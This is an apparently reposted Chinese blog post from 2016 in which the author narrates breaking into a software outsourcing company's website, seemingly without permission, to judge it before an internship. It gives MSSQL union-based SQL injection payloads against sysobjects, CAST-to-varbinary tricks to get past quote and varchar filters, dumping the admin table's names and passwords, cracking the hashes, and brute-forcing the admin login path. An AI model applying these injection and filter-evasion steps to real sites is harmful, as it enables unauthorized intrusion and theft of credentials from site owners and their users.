鸿 网 互 联 www.68idc.cn

某软件外包公司手动+自动化注入

来源:互联网 作者:佚名 时间:2016-05-07 10:08
最近要实习了、朋友发给我发了个java工程师招聘公司,测测安全来检测一下公司的实力,不搞破坏 以下是入侵过程的笔记,为了保护网站,把关键字稍微处理了下: 发现有注入漏洞,但是扔到工具里面跑不出来,只能手动注入。 利用burpsuite构造语句,自动化攻击。语
最近要实习了、朋友发给我发了个java工程师招聘公司,测测安全来检测一下公司的实力,不搞破坏
 
以下是入侵过程的笔记,为了保护网站,把关键字稍微处理了下:
 
发现有注入漏洞,但是扔到工具里面跑不出来,只能手动注入。
利用burpsuite构造语句,自动化攻击。语句如下:
 
=2+and+1=2+union+all+select+(select+top+1+name+from+sysobjects+where+name+not+in+(select+top+7+name+from+sysobjects+))--
 
跑出来的结果:
 
 
可以看出存放管理员账号密码的数据表,接下来构造爆字段语句。由于网站过滤了单引号,所以这里用cast()函数来将表明转化为二进制,然后再转回来:
--将表名转化为二进制
select CAST ('Dcms_Admin'
AS varbinary)
 
--将二进制转为表明
select cast (0x74657374 as varCHAR( 1000))
 
--爆表的id
(select top 1 object_id (CAST( 0x74657374 as varchar(4000 ))) from sysobjects)
 
 
 
但是网站弹出如下错误:
 
过滤了varchar,那换成换成char(1000),本地搭建mssql环境进行测试。爆出来的id就为null,查看了一下函数声明object_id(nvarchar),换成char()就爆不出来了。不知道大家有什么其他方法,这里我换个思路,既然已经知道了表明,直接用字典跑字段好了。
 
 
直接查name ,passwd:
 
密码扔到cmd5上跑了5天.......
用普通工具扫不到网站后台...尴尬。所以打算通过注入拿到账号密码之前一定要先扫到后台。
网上找了个大字典。用御剑直接跑出来了~~~~
后面过程就不解释了。
 
看看后台,是基于designCMS进行二次开发的网站。我还以为作为软件公司,应该自己设计一个网站。用现有的开源框架虽然省事省力,但是爆出0day就容易沦陷。这样看来如果去他们公司实习,也是各种二次开发了、
 
网友评论
<